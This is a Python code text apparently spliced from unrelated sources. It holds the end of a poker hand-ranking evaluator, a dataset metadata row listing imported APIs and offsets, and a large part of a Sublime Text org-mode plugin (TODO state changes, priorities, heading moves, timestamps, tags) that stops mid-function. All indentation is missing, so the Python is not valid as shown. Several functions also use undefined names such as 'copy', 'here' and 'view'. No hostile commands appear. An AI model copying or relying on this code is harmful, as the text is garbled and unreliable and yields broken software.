elif len(card_counter) == 2:
# If 2 cards and counts are 3,2 is full house
if 3 in card_counter.values():
ranking = 6
# Otherwise, quads
else:
ranking = 7
# Must be trips or two pairs
elif len(card_counter) == 3:
if 3 in card_counter.values():
ranking = 3
else:
ranking = 2
# Must be one pairs
elif len(card_counter) == 4:
ranking = 1
# High card
else:
ranking = 0
# Init hand strength vector
hand_strength = [ranking]
# Add hand strength data
# Sort card counter dict by count, card integer value, and add data. This is enough info to rank hands
sorted_high_cards = sorted(card_counter.items(), key=lambda x: (x[1],x[0]), reverse=True)
for i in range(len(sorted_high_cards)):
hand_strength.append(sorted_high_cards.pop(0)[0])
# Logic to describe hand
desc_vals = [str(REVERSE_VALS[i]) if idx > 0 else 'None' for idx, i in enumerate(hand_strength)]
if ranking == 8:
if 13 in hand_strength and 4 in hand_strength:
return 'Straight Flush 5 high'
else:
desc = 'Straight Flush ' + desc_vals[1] + ' high'
elif ranking == 7:
desc = 'Quad ' + desc_vals[1] + ' ' + desc_vals[2] + ' high'
elif ranking == 6:
desc = 'Full House ' + desc_vals[1] + ' full of ' + desc_vals[2]
elif ranking == 5:
desc = 'Flush ' + desc_vals[1] + ' high'
elif ranking == 4:
desc = 'Straight ' + desc_vals[1] + ' high'
elif ranking == 3:
desc = 'Trip ' + desc_vals[1]
elif ranking == 2:
desc = 'Two Pairs ' + desc_vals[1] + ' and '+desc_vals[2]+' '+desc_vals[3]+' high'
elif ranking == 1:
desc = 'One Pair ' + desc_vals[1] + ' ' + desc_vals[2] + desc_vals[3] + desc_vals[4] + ' high'
elif ranking == 0:
desc = 'High Card ' + desc_vals[1] + ' ' + desc_vals[2] + desc_vals[3] + desc_vals[4] + desc_vals[5] +' high'
return hand_strength, desc
def eval_hands(hands):
"""
hands :: list :: list of int hand_strength, 1st output of read_hand
=======
Returns
candidates :: iterable :: strongest hand(s), may be more than 1 hand if there is a split
"""
card = 0
candidates = [i for i in range(len(hands))]
# Evaluates hands
# Looks at first index of each hand in hands, retains largest
# Iterates over indices, each time retaining largest int (strongest hand hierarchically)
while len(candidates) != 1:
try:
strongest = max([hands[hand][card] for hand in candidates])
keep = []
for i in range(len(candidates)):
if strongest == hands[candidates[i]][card]:
keep.append(i)
candidates = [candidates[i] for i in keep]
card += 1
except:
# If there is more than 1 strongest hand, splits
break
return candidates[0]
def eval_combos(hands):
# Given several hands, find the strongest hand with our evaluation engine above
hand_strs = []
descs = []
for hand in hands:
hand_str, desc = read_hand(hand)
hand_strs.append(hand_str)
descs.append(desc)
strongest_hand = eval_hands(hand_strs)
return hands[strongest_hand], hand_strs[strongest_hand], descs[strongest_hand]
def combos(cards, n = 5):
# Create hand combos
return [list(combo) for combo in combinations(cards, n)]
| [
"collections.Counter",
"itertools.combinations"
] | [((2383, 2401), 'collections.Counter', 'Counter', (['card_vals'], {}), '(card_vals)\n', (2390, 2401), False, 'from collections import Counter\n'), ((6462, 6484), 'itertools.combinations', 'combinations', (['cards', 'n'], {}), '(cards, n)\n', (6474, 6484), False, 'from itertools import combinations\n')] |
import sublime
import sublime_plugin
import datetime
import re
from pathlib import Path
import os
import fnmatch
import OrgExtended.orgparse.loader as loader
import OrgExtended.orgparse.node as node
import OrgExtended.orgparse.date as orgdate
from OrgExtended.orgparse.sublimenode import *
import OrgExtended.orgutil.util as util
import OrgExtended.orgutil.navigation as nav
import OrgExtended.orgutil.template as templateEngine
import logging
import sys
import traceback
import OrgExtended.orgfolding as folding
import OrgExtended.orgdb as db
import OrgExtended.asettings as sets
import OrgExtended.pymitter as evt
import OrgExtended.orgproperties as props
import OrgExtended.orgdatepicker as datep
import OrgExtended.orginsertselected as insSel
import OrgExtended.orglinks as orglink
import OrgExtended.orgneovi as nvi
import OrgExtended.orgagenda as oa
import OrgExtended.orgcheckbox as checkbox
import OrgExtended.orgnumberedlist as numberedlist
log = logging.getLogger(__name__)
# MOVING TO ANY DONE STATE:
# Support these:
#+STARTUP: lognotedone Prompt and stored below the item with a Closing Note heading.
#+STARTUP: logdone CLOSED: [TIMESTAMP] in LOGBOOK
# As well as configuration options
#
# PER TRANSITON MOVEMENT:
# @ - note
# ! - timestamp
# / - when leaving the state if next state doesn't log
#
# Then they go futher with: :LOGGING: WAIT(@) logrepeat properties
#
# - 1) We need the transitions recorded in the node (in the todos list)
# - 2) We need a method to insert CLOSED: and or prompt and note
# - 3) We need to track the state transitions themselves (from / to)
#
# - 4) Habits break all this with LAST_REPEAT and To From transition text.
#
RE_CLOSED = re.compile(r"^\s*CLOSED:\s*\[.*\]")
def LocateClosed(view,node):
for row in range(node.start_row, node.local_end_row + 1):
pt = view.text_point(row,0)
line = view.line(pt)
lstr = view.substr(line)
m = RE_CLOSED.search(lstr)
if(m):
return line
return None
def InsertClosed(view, node, onDone=None):
stamp = OrgDate.format_clock(datetime.datetime.now(),active=False)
closedPt = LocateClosed(view,node)
if(closedPt):
text = node.indent() + "CLOSED: " + stamp
view.ReplaceRegion(closedPt, text, onDone)
else:
row = node.start_row+1
pt = view.text_point(row,0)
newline = "\n" if view.isBeyondLastRow(row) else ""
text = newline + node.indent() + "CLOSED: " + stamp + "\n"
view.Insert(pt, text, onDone)
#props.UpdateLogbook(view,node, "CLOSED:", stamp)
def RemoveClosed(view, node, onDone=None):
closedPt = LocateClosed(view, node)
if(closedPt):
view.ReplaceRegion(closedPt.IncEnd(),"",onDone)
#view.run_command("org_internal_replace", {"start": closedPt.begin(), "end": closedPt.end() + 1, "text": "", "onDone": onDone})
else:
evt.EmitIf(onDone)
def IsDoneState(node, toState):
return toState in node.env.done_keys
def ShouldRecur(node, fromState, toState):
if(IsDoneState(node, toState)):
if(node.scheduled and node.scheduled.repeating):
return node.scheduled
if(node.deadline and node.deadline.repeating):
return node.deadline
timestamps = node.get_timestamps(active=True,point=True,range=True)
for t in timestamps:
if(t and t.repeating):
return t
return None
def ShouldClose(node, fromState, toState):
if(ShouldRecur(node,fromState,toState)):
return False
# NOTE: We need to get the todo transitions
# into this as well!
toState = toState.strip()
startup = node.root.startup()
if(IsDoneState(node, toState) and Startup.logdone in startup):
return True
def InsertRecurrence(view, node, fromState, toState, onDone=None):
# - State "DONE" from "TODO" [2009-09-29 Tue]"
stamp = OrgDate.format_clock(datetime.datetime.now(),active=False)
def OnLogAdded():
props.UpdateProperty(view, node, "LAST_REPEAT", stamp, onDone)
props.AddLogbook(view,node, "- State {0:12} from {1:12} ".format('"' + toState + '"', '"' + fromState + '"'), stamp, evt.Make(OnLogAdded))
def InsertNote(view, node, text, fromState, toState, onDone=None):
stamp = OrgDate.format_clock(datetime.datetime.now(),active=False)
props.AddLogbook(view,node, "Note (to:{0},at:{1}): ".format(toState,stamp), text, onDone)
def ShouldNote(node, fromState, toState):
if(ShouldRecur(node,fromState,toState)):
return False
# NOTE: We need to get the todo transitions
# into this as well!
toState = toState.strip()
startup = node.root.startup()
if(IsDoneState(node,toState) and Startup.lognotedone in startup):
return True
RE_T = re.compile(r'\s(?P<time><\s*\d+-\d+-\d+\s+[^>]+>)(\s+|$)')
# Use a menu to change the todo state of an item
class OrgTodoChangeCommand(sublime_plugin.TextCommand):
def on_totally_done(self):
evt.EmitIf(self.onDone)
# recurrence needs to update the base timestamp!
# This needs to respect the .+ ++ and + markers
def on_update_timestamps_if_needed(self, row=0):
# We have to reload our node as we updated things.
self.node = db.Get().At(self.view, self.node.start_row)
if(row > (self.node.local_end_row+1)):
self.on_totally_done()
for i in range(self.node.start_row+row, self.node.local_end_row+1):
pt = self.view.text_point(i, 0)
line = self.view.line(pt)
txt = self.view.substr(line)
m = RE_T.search(txt)
now = datetime.datetime.now()
if(m):
tsl = OrgDate.list_from_str(m.group('time'))
if(tsl):
t = tsl[0]
if(t.repeating):
next = t.start
next2 = t.end
if(t.repeatpre == "+"):
next = t.next_repeat_from(oa.EnsureDateTime(next))
elif(t.repeatpre == "++"):
while(next < now):
next = t.next_repeat_from(oa.EnsureDateTime(next))
elif(t.repeatpre == ".+"):
next = t.next_repeat_from(now)
s = m.start(1)
e = m.end(1)
rpt = t.repeatpre + str(t.repeatnum) + t.repeatdwmy
wrn = ""
if(t.warning):
wrn = " " + t.warnpre + str(t.warnnum) + t.warndwmy
if(t.has_end()):
if(t.has_time()):
nout = txt[:s] + next.strftime("<%Y-%m-%d %a %H:%M-") + t.end.strftime("%H:%M ")+ rpt + wrn + ">" + txt[e:]
else:
# This really shouldn't happen.
nout = txt[:s] + next.strftime("<%Y-%m-%d %a ")+ rpt + wrn + ">" + txt[e:]
else:
if(t.has_time()):
nout = txt[:s] + next.strftime("<%Y-%m-%d %a %H:%M ") + rpt + wrn + ">" +txt[e:]
else:
nout = txt[:s] + next.strftime("<%Y-%m-%d %a ")+ rpt + wrn + ">" + txt[e:]
self.view.run_command("org_internal_replace", {"start": line.begin(), "end": line.end(), "text": nout, "onDone": evt.Make(lambda:self.on_update_timestamps_if_needed(i+1)) })
return
self.on_totally_done()
def do_recurrence_if_needed(self):
self.rec = ShouldRecur(self.node,self.fromState,self.newState)
if(self.rec):
InsertRecurrence(self.view, self.node, self.fromState, self.newState, evt.Make(self.on_update_timestamps_if_needed))
else:
self.on_totally_done()
def do_close_if_needed(self):
if(ShouldClose(self.node,self.fromState,self.newState)):
InsertClosed(self.view, self.node, evt.Make(self.do_recurrence_if_needed))
else:
RemoveClosed(self.view, self.node, evt.Make(self.do_recurrence_if_needed))
def on_insert_note(self, text):
InsertNote(self.view, self.node, text, self.fromState, self.newState, evt.Make(self.do_close_if_needed))
def do_note_if_needed(self):
if(ShouldNote(self.node,self.fromState, self.newState)):
self.view.window().show_input_panel("("+self.fromState + ">>" + self.newState + ") Note:","", self.on_insert_note, None, None)
else:
self.do_close_if_needed()
def on_done_st4(self,index,modifers):
self.on_done(index)
def on_done(self, index):
if(index < 0):
return
newState = self.todoStates[index]
if(newState == "none"):
newState = ""
# if we don't have a TODO state then we have to handle that as well.
m = self.todoRe.search(self.bufferContents)
fromState = None
if(m == None):
self.todoRe = re.compile(r"^([*]+ (\[\#[a-zA-Z0-9]+\]\s+)?)( )*")
else:
fromState = m.group(3)
if(newState != ""):
newState += " "
self.bufferContents = self.todoRe.sub(r"\g<1>" + newState, self.bufferContents)
# We have to do the editing in sequence because the reloads can get mixed up otherwise
if(fromState):
self.fromState = fromState.strip()
else:
self.fromState = ""
self.newState = newState.strip()
# Recurring events do not hit the done state when you toggle them
# They bounce back to TODO they just get a new note in them
if(ShouldRecur(self.node, self.fromState,self.newState)):
self.do_note_if_needed()
else:
self.view.ReplaceRegion(self.row,self.bufferContents, evt.Make(self.do_note_if_needed))
def run(self, edit, onDone=None):
self.onDone = onDone
self.node = db.Get().AtInView(self.view)
#self.todoStates = sets.Get("todoStates", sets.defaultTodoStates)
todos = self.node.env.all_todo_keys
if(len(todos) > 0):
self.todoStates = todos
self.todoStates += ["none"]
else:
for i in range(0, len(self.todoStates)):
if(self.todoStates[i] == "|"):
self.todoStates[i] = "none"
# ACTION vs DONE states
# TODO" "FEEDBACK" "VERIFY" "|" "DONE" "DELEGATED
row = self.node.start_row
self.todoRe = r"^([*]+ (\[\#[a-zA-Z0-9]+\]\s+)?)("
haveFirst = False
for state in self.todoStates:
if state != "|":
if(haveFirst):
self.todoRe += "|"
self.todoRe += state
haveFirst = True
self.todoRe += r")( )*"
self.todoRe = re.compile(self.todoRe)
sp = self.view.text_point(row,0)
self.row = self.view.line(sp)
self.bufferContents = self.view.substr(self.row)
if(int(sublime.version()) <= 4096):
self.view.window().show_quick_panel(self.todoStates, self.on_done, -1, -1)
else:
self.view.window().show_quick_panel(self.todoStates, self.on_done_st4, -1, -1)
# Use a menu to change the priority of an item
class OrgPriorityChangeCommand(sublime_plugin.TextCommand):
def on_done_st4(self,index,modifers):
self.on_done(index)
def on_done(self, index):
if(index < 0):
return
newState = self.priorities[index]
if(newState == "none"):
newState = ""
# if we don't have a TODO state then we have to handle that as well.
m = self.Re.search(self.bufferContents)
if(m == None):
todos = self.node.env.all_todo_keys
todos = '|'.join(todos)
self.Re = re.compile(r"^([*]+\s+(" + todos + r")?\s*)( )*")
if(newState != ""):
newState = "[#" + newState + "] "
self.bufferContents = self.Re.sub(r"\g<1>" + newState, self.bufferContents)
self.view.ReplaceRegion(self.row, self.bufferContents, self.onDone)
#self.view.run_command("org_internal_replace", {"start": self.row.begin(), "end": self.row.end(), "text": self.bufferContents, "onDone": self.onDone})
#self.view.replace(self.edit, self.row, self.bufferContents)
def run(self, edit, onDone = None):
self.onDone = onDone
self.node = db.Get().AtInView(self.view)
self.priorities = self.node.priorities()
self.priorities = copy.copy(self.priorities)
self.priorities.append("none")
row = self.node.start_row
self.Re = r"^([*]+ [^\[\]]*\s*)(\[\#[a-zA-Z0-9]+\]\s+)"
self.Re = re.compile(self.Re)
sp = self.view.text_point(row,0)
self.row = self.view.line(sp)
self.bufferContents = self.view.substr(self.row)
if(int(sublime.version()) <= 4096):
self.view.window().show_quick_panel(self.priorities, self.on_done, -1, -1)
else:
self.view.window().show_quick_panel(self.priorities, self.on_done_st4, -1, -1)
def indent_node(view, node, edit):
# Indent the node itself
sp = view.text_point(node.start_row,0)
view.insert(edit,sp,"*")
# Indent MY content
for i in range(node.start_row+1,node.local_end_row+1):
sp = view.text_point(i,0)
view.insert(edit,sp," ")
# Find my children and indent them.
for n in node.children:
indent_node(view, n, edit)
def indent_list(view, row, edit):
# Indent the node itself
sp = view.text_point(row,0)
view.insert(edit,sp," ")
line = view.lineAt(row)
children,crow = numberedlist.findChildrenByIndent(view, line)
for r in range(row+1,crow):
sp = view.text_point(r,0)
view.insert(edit,sp," ")
def deindent_list(view, row, edit):
# Get my position and ensure this node CAN de-indent
sp = view.text_point(row,0)
ep = view.text_point(row,1)
np = view.text_point(row,2)
bufferContents = view.substr(sublime.Region(sp,np))
bufferContentsS = view.substr(sublime.Region(sp,ep))
wasTab = bufferContentsS == "\t"
if(bufferContents == " " or wasTab):
if(wasTab):
view.erase(edit,sublime.Region(sp,ep))
else:
view.erase(edit,sublime.Region(sp,np))
line = view.lineAt(row)
children,crow = numberedlist.findChildrenByIndent(view, line)
for r in range(row+1,crow):
sp = view.text_point(r,0)
ep = view.text_point(r,1)
np = view.text_point(r,2)
bufferContents = view.substr(sublime.Region(sp,np))
bufferContentsS = view.substr(sublime.Region(sp,ep))
wasTab = bufferContentsS == "\t"
if(bufferContents == " " or wasTab):
if(wasTab):
view.erase(edit,sublime.Region(sp,ep))
else:
view.erase(edit,sublime.Region(sp,np))
def deindent_node(view, node, edit):
# Get my position and ensure this node CAN de-indent
sp = view.text_point(node.start_row,0)
ep = view.text_point(node.start_row,1)
np = view.text_point(node.start_row,2)
bufferContents = view.substr(sublime.Region(ep,np))
if(bufferContents == "*"):
view.erase(edit,sublime.Region(sp,ep))
# Now erase a space at the front of my contents.
for i in range(node.start_row+1,node.local_end_row+1):
sp = view.text_point(i,0)
ep = view.text_point(i,1)
bufferContents = view.substr(sublime.Region(sp,ep))
if(bufferContents == " " or bufferContents == "\t"):
view.erase(edit,sublime.Region(sp,ep))
for n in node.children:
deindent_node(view, n, edit)
else:
log.debug("Did not get star, not deindenting it " + str(len(bufferContents)) + " " + bufferContents)
# Thing is a region, and first line of the thing tuple
# things is a list of thing
def sort_things_alphabetically(things,reverse=False):
things.sort(key=lambda thing: thing[1],reverse=reverse)
class OrgSortListCommand(sublime_plugin.TextCommand):
def run(self, edit):
# Get a list of things
things = None
wasNumbered = False
if(numberedlist.isNumberedLine(self.view)):
wasNumbered = True
things = numberedlist.getListAtPointForSorting(self.view)
elif(checkbox.isUnorderedList(self.view.getLine(self.view.curRow()))):
things = checkbox.getListAtPointForSorting(self.view)
if(not things):
log.error(" Could not sort at point")
return
# Build macro region
start = things[0][0][0]
end = things[len(things)-1][0][1]
sp = self.view.text_point(start,0)
ep = self.view.text_point(end,0)
ep = self.view.line(ep).end()
reg = sublime.Region(sp,ep)
# Sort the things
sort_things_alphabetically(things)
# Copy from macro region to sorted version
buffer = ""
for thing in things:
bs = self.view.text_point(thing[0][0],0)
be = self.view.text_point(thing[0][1]-1,0)
be = self.view.line(be).end()
breg = sublime.Region(bs,be)
ss = self.view.substr(breg).rstrip() + "\n"
buffer += ss
# Replace the macro region with new str
self.view.replace(edit, reg, buffer)
if(wasNumbered):
self.view.run_command('org_update_numbered_list')
pass
class OrgSelectSubtreeCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
self.view.sel().clear()
self.view.sel().add(reg)
class OrgCopySubtreeCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
nodetext = self.view.substr(reg)
sublime.set_clipboard(nodetext)
nvi.TestAndSetClip(self.view, nodetext)
class OrgSelectEntityCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.local_end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
self.view.sel().clear()
self.view.sel().add(reg)
class OrgCopyEntityCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.local_end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
nodetext = self.view.substr(reg)
sublime.set_clipboard(nodetext)
nvi.TestAndSetClip(self.view, nodetext)
class OrgCopyLinkHrefCommand(sublime_plugin.TextCommand):
def run(self, edit):
if(self.view.match_selector(self.view.sel()[0].begin(), "orgmode.link")):
pt = self.view.sel()[0].end()
links = self.view.find_by_selector("orgmode.link")
hrefs = self.view.find_by_selector("orgmode.link.href")
reg = None
for link in links:
line = self.view.line(link.begin())
if(line.contains(pt)):
for href in hrefs:
if(line.contains(href.begin())):
reg = href
break
break
if(reg):
nodetext = self.view.substr(reg)
sublime.set_clipboard(nodetext)
nvi.TestAndSetClip(self.view, nodetext)
class OrgSelectLinkHrefCommand(sublime_plugin.TextCommand):
def run(self, edit):
if(self.view.match_selector(self.view.sel()[0].begin(), "orgmode.link")):
pt = self.view.sel()[0].end()
links = self.view.find_by_selector("orgmode.link")
hrefs = self.view.find_by_selector("orgmode.link.href")
reg = None
for link in links:
line = self.view.line(link.begin())
if(line.contains(pt)):
for href in hrefs:
if(line.contains(href.begin())):
reg = href
break
break
if(reg):
self.view.sel().clear()
self.view.sel().add(reg)
class OrgMoveHeadingUpCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index > 1):
targetNode = curNode.get_sibling_up()
if(targetNode):
index = targetNode._index - 1
r,c = self.view.curRowCol()
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
nodetext = self.view.substr(reg)
sp = self.view.text_point(targetNode.start_row, 0)
treg = sublime.Region(sp, sp)
self.view.erase(edit,reg)
self.view.insert(edit,sp,nodetext)
self.view.sel().clear()
np = self.view.text_point(targetNode.start_row, c)
self.view.sel().add(np)
class OrgMoveHeadingDownCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
if(curNode and type(curNode) != node.OrgRootNode and curNode._index < (len(curNode.env._nodes) - 1)):
targetNode = curNode.get_sibling_down()
if(targetNode):
temp = curNode
curNode = targetNode
targetNode = temp
index = targetNode._index - 1
sp = self.view.text_point(curNode.start_row, 0)
ep = self.view.text_point(curNode.end_row, 0)
r = self.view.line(ep)
reg = sublime.Region(sp, r.end()+1)
nodetext = self.view.substr(reg)
sp = self.view.text_point(targetNode.start_row, 0)
treg = sublime.Region(sp, sp)
endline = self.view.line(self.view.size())
if(curNode.is_last_node() and curNode.end_row >= self.view.endRow()):
line = self.view.substr(self.view.line(self.view.text_point(self.view.endRow(),0)))
isEmpty = line.strip() == ""
if(not isEmpty):
nodetext = nodetext + "\n"
self.view.erase(edit,reg)
self.view.insert(edit,sp,nodetext)
class OrgInsertHeadingSiblingCommand(sublime_plugin.TextCommand):
def run(self, edit):
curNode = db.Get().AtInView(self.view)
needsNewline = False
if(not curNode):
level = 1
here = sublime.Region(self.view.size(),self.view.size())
reg = here
text = self.view.substr(self.view.line(reg))
if(text.strip() != ""):
needsNewline = True
else:
level = curNode.level
reg = curNode.region(self.view,True) # trim ending whitespace
if(level == 0):
level = 1
here = sublime.Region(self.view.size(),self.view.size())
text = self.view.substr(self.view.line(reg))
if(text.strip() != ""):
needsNewline = True
else:
here = sublime.Region(reg.end(),reg.end())
text = self.view.substr(self.view.line(here))
if(text.strip() != ""):
needsNewline = True
self.view.sel().clear()
self.view.sel().add(reg.end())
self.view.show(here)
if(needsNewline):
self.view.insert(edit,self.view.sel()[0].begin(),'\n')
ai = sublime.active_window().active_view().settings().get('auto_indent')
self.view.settings().set('auto_indent',False)
self.view.run_command("insert_snippet", {"name" : "Packages/OrgExtended/orgsnippets/heading"+str(level)+".sublime-snippet"})
sublime.active_window().active_view().settings().set('auto_indent',ai)
class OrgInsertHeadingChildCommand(sublime_plugin.TextCommand):
def run(self, edit, onDone=None):
curNode = db.Get().AtInView(self.view)
needsNewline = False
if(not curNode):
file = db.Get().FindInfo(self.view)
if(len(file.org) > 0):
curNode = file.org[len(file.org) - 1]
if(not curNode):
level = 1
l = self.view.line(self.view.size())
reg = sublime.Region(l.start(),l.start())
reg = here
else:
level = curNode.level
reg = curNode.region(self.view, True)
if(level == 0):
level = 1
here = sublime.Region(view.size(),view.size())
else:
here = sublime.Region(reg.end(),reg.end())
text = self.view.substr(self.view.line(here))
if(text.strip() != ""):
needsNewline = True
if(not needsNewline):
ll = self.view.line(reg.end())
text = self.view.substr(ll)
if(text.strip() == "" and len(text) > 0):
# This is an empty line! Have to work at the front of this line!
# Or we will insert to an odd location!
reg = sublime.Region(ll.start(), ll.start())
self.view.sel().clear()
self.view.sel().add(reg.end())
self.view.show(here)
if(needsNewline):
self.view.insert(edit,self.view.sel()[0].begin(),'\n')
ai = sublime.active_window().active_view().settings().get('auto_indent')
self.view.settings().set('auto_indent',False)
self.view.run_command("insert_snippet", {"name" : "Packages/OrgExtended/orgsnippets/heading"+str((level+1))+".sublime-snippet"})
sublime.active_window().active_view().settings().set('auto_indent',ai)
evt.EmitIf(onDone)
# This will insert whatever text you provide as a child heading of the current node
class OrgInsertTextAsChildHeadingCommand(sublime_plugin.TextCommand):
def run(self, edit, heading=None, onDone=None):
curNode = db.Get().AtInView(self.view)
if(not curNode):
file = db.Get().FindInfo(self.view)
if(len(file.org) > 0):
curNode = file.org[len(file.org) - 1]
if(not curNode):
level = 1
l = self.view.line(self.view.size())
reg = sublime.Region(l.start(),l.start())
reg = here
else:
level = curNode.level
reg = curNode.region(self.view)
if(level == 0):
level = 1
here = sublime.Region(view.size(),view.size())
else:
here = sublime.Region(reg.end(),reg.end())
self.view.sel().clear()
self.view.sel().add(reg.end()+1)
#self.view.show(here)
self.view.insert(edit,self.view.sel()[0].begin(),'\n' + ('*'*(level+1)) + ' ' + heading)
evt.EmitIf(onDone)
class OrgInsertTodayInactiveCommand(sublime_plugin.TextCommand):
def run(self, edit):
now = datetime.datetime.now()
toInsert = orgdate.OrgDate.format_date(now, False)
self.view.insert(edit,self.view.sel()[0].begin(), toInsert)
class OrgInsertNowInactiveCommand(sublime_plugin.TextCommand):
def run(self, edit):
now = datetime.datetime.now()
toInsert = orgdate.OrgDate.format_clock(now, False)
self.view.insert(edit,self.view.sel()[0].begin(), toInsert)
class OrgInsertTodayActiveCommand(sublime_plugin.TextCommand):
def run(self, edit):
now = datetime.datetime.now()
toInsert = orgdate.OrgDate.format_date(now, True)
self.view.insert(edit,self.view.sel()[0].begin(), toInsert)
class OrgInsertNowActiveCommand(sublime_plugin.TextCommand):
def run(self, edit):
now = datetime.datetime.now()
toInsert = orgdate.OrgDate.format_clock(now, True)
self.view.insert(edit,self.view.sel()[0].begin(), toInsert)
class OrgInsertDateInactiveCommand(sublime_plugin.TextCommand):
def insert(self, date):
if(date):
self.view.Insert(self.view.sel()[0].begin(), OrgDate.format_clock(date.start, active=False))
def run(self, edit):
datep.Pick(evt.Make(self.insert))
class OrgInsertDateActiveCommand(sublime_plugin.TextCommand):
def insert(self, date):
if(date):
self.view.Insert(self.view.sel()[0].begin(), OrgDate.format_clock(date.start, active=True))
def run(self, edit):
datep.Pick(evt.Make(self.insert))
class OrgBaseTimestampCommand(sublime_plugin.TextCommand):
def __init__(self,unknown=None, prefix=None):
super(OrgBaseTimestampCommand, self).__init__(unknown)
self.prefix = prefix
def insert(self, date):
if(date):
self.view.Insert(self.view.sel()[0].begin(), OrgDate.format_clock(date.start, active=True))
else:
self.view.Erase(self.reg)
self.view.sel().clear()
self.view.sel().add(self.oldsel)
def run(self, edit, dateval=None):
if(type(dateval) == str):
dateval = orgdate.OrgDateFreeFloating.from_str(dateval)
# TODO: Find scheduled and replace it as well.
node = db.Get().AtInView(self.view)
if(node and not node.is_root()):
self.oldsel = self.view.sel()[0]
pt = self.view.text_point(node.start_row,0)
l = self.view.line(pt)
# Last row handling If we are the last row we can't jump over the newline
# we have to add one.
nl = ""
addnl = 1
if(self.view.isBeyondLastRow(node.start_row+1)):
nl = "\n"
addnl = 0
insertpt = l.end() + addnl
endpt = insertpt + len(nl) + len(node.indent()) + len(self.prefix)
self.reg = sublime.Region(insertpt, endpt)
self.view.insert(edit, insertpt, nl + node.indent() + self.prefix)
pt = self.view.text_point(node.start_row+1,0)
l = self.view.line(pt)
self.view.sel().clear()
self.view.sel().add(l.end())
if(dateval == None):
datep.Pick(evt.Make(self.insert))
else:
self.insert(dateval)
class OrgScheduleCommand(OrgBaseTimestampCommand):
def __init__(self,unknown=None):
super(OrgScheduleCommand, self).__init__(unknown,"SCHEDULED: \n")
class OrgDeadlineCommand(OrgBaseTimestampCommand):
def __init__(self,unknown=None):
super(OrgDeadlineCommand, self).__init__(unknown,"DEADLINE: \n")
class OrgActiveTimestampCommand(OrgBaseTimestampCommand):
def __init__(self,unknown=None):
super(OrgActiveTimestampCommand, self).__init__(unknown," \n")
class OrgInsertClosedCommand(sublime_plugin.TextCommand):
def run(self, edit):
node = db.Get().AtInView(self.view)
if(not node.is_root()):
self.oldsel = self.view.sel()[0]
pt = self.view.text_point(node.start_row,0)
l = self.view.line(pt)
# Last row handling If we are the last row we can't jump over the newline
# we have to add one.
nl = ""
addnl = 1
if(self.view.isBeyondLastRow(node.start_row+1)):
nl = "\n"
addnl = 0
now = datetime.datetime.now()
toInsert = orgdate.OrgDate.format_clock(now, False)
self.view.insert(edit, l.end() + addnl, nl + node.indent() + "CLOSED: "+toInsert+"\n")
# ================================================================================
RE_TAGS = re.compile(r'^(?P<heading>[*]+[^:]+\s*)(\s+(?P<tags>[:]([^: ]+[:])+))?$')
class OrgInsertTagCommand(sublime_plugin.TextCommand):
def OnDone(self, text):
if(not text):
return
node = db.Get().AtInView(self.view)
if(node):
if not text in node.tags:
(region, line) = self.view.getLineAndRegion(node.start_row)
m = RE_TAGS.search(line)
if(m.group('tags') != None):
tags = m.group('tags') + text + ":"
else:
tags = " :" + text + ":"
toline = "{0:70}{1}".format(m.group('heading'), tags)
self.view.ReplaceRegion(region,toline,self.onDone)
else:
log.debug("Tag already part of node")
evt.EmitIf(self.onDone)
def run(self, edit, text=None, onDone=None):
self.onDone = onDone
self.text = text.strip() if text != None else text
if(self.text != None and self.text != ""):
self.OnDone(self.text)
else:
self.input = insSel.OrgInput()
self.input.run("Tag:",db.Get().tags,evt.Make(self.OnDone))
# ================================================================================
class OrgInsertArchiveTagCommand(sublime_plugin.TextCommand):
def OnDone(self):
evt.EmitIf(self.onDone)
def run(self, edit, onDone=None):
self.onDone = onDone
self.view.run_command("org_insert_tag",{"onDone": evt.Make(self.OnDone), "text": "ARCHIVE"})
# ================================================================================
class OrgInsertCustomIdCommand(sublime_plugin.TextCommand):
def on_done(self, text):
if(text):
# No spaces allowed in a custom id
text = text.replace(" ","-")
node = db.Get().AtInView(self.view)
if(node and not node.is_root()):
props.UpdateProperty(self.view,node,"CUSTOM_ID",text,self.onDone)
def run(self, edit, onDone=None):
self.onDone = onDone
self.input = insSel.OrgInput()
#print(str(db.Get().customids))
self.input.run("Custom Id:",db.Get().customids, evt.Make(self.on_done))
# ================================================================================
class OrgSetTodayCommand(sublime_plugin.TextCommand):
def run(self, edit, onDone=None):
self.onDone = onDone
idValue = "TODAY"
node = db.Get().AtInView(self.view)
if(not node or node.is_root()):
log.debug("Cannot update root node or non existent node as today")
return
file, at = db.Get().FindByCustomId(idValue)
if(file != None and at != None):
node = file.At(at)
if(node):
props.RemoveProperty(self.view, node, "CUSTOM_ID")
node = db.Get().AtInView(self.view)
if(node and not node.is_root()):
props.UpdateProperty(self.view,node,"CUSTOM_ID",idValue,self.onDone)
def get_view_for_silent_edit_file(file):
# First check all sheets for this file.
window = sublime.active_window()
view = window.find_open_file(file.filename)
if(view):
return view
# Okay the file is not opened, we have to open it
# but we don't want it having focus
# So keep the old view so we can refocus just to
# be sure.
